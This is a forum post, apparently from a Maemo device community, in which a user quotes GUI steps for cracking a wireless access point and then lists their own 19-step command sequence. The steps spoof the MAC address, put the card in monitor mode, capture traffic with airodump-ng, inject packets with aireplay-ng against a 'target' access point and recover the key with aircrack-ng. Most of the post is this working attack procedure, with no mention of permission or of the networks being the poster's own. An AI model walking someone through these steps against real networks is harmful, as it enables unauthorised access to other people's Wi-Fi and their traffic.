View Single Post
Posts: 435 | Thanked: 197 times | Joined on Feb 2010
#170
Originally Posted by pusak gaoq View Post
follow these step....
<...>
7.then press the capture button below the AP list.....
8. a x-term will popup to show the capture to that AP....look carefully at the data...if the data keep getting collected then just waits until the data is at 30k-50k....this show that the AP is active...
<...>
10a.if the AP is active & the data is collected at 30k-50k then go back to cleven menu (closed the x-term) then press the cleven status bar & select decrypt captured
<...>
Please anybody correct me if I'm wrong (I'm still a little new at networking), but I thought you had to Capture, Authenticate, AND Inject every single time... These are the steps I used to do before the GUI was created (again, please correct me if I'm mistaken):

01) cd MyDocs/wl1251-maemo/binary/compat-wireless
02) sh load.sh
03) *Open new root xterm*
04) ifconfig wlan0 up
05) iwlist wlan0 scan
06) *copy target mac address*
07) ifconfig wlan0 down
08) iwconfig wlan0 mode monitor
09) macchanger -r wlan0 |grep Faked
10) ifconfig wlan0
11) ifconfig wlan0 up
12) airodump-ng -c 8 -w [filename] wlan0
13) *open new root xterm session*
14) aireplay-ng -1 0 -a [paste MAC here] wlan0
15) aireplay-ng -3 -b [paste MAC here] wlan0
16) *open new root xterm session*
17) aircrack-ng [filename]-01.cap
18) *open new root xterm session*
19) aireplay-n -2 -p 0841 -a [MAC]

When the GUI came out, I began understanding a little more of what I was doing and why, but I'm still not catching 100% of it :s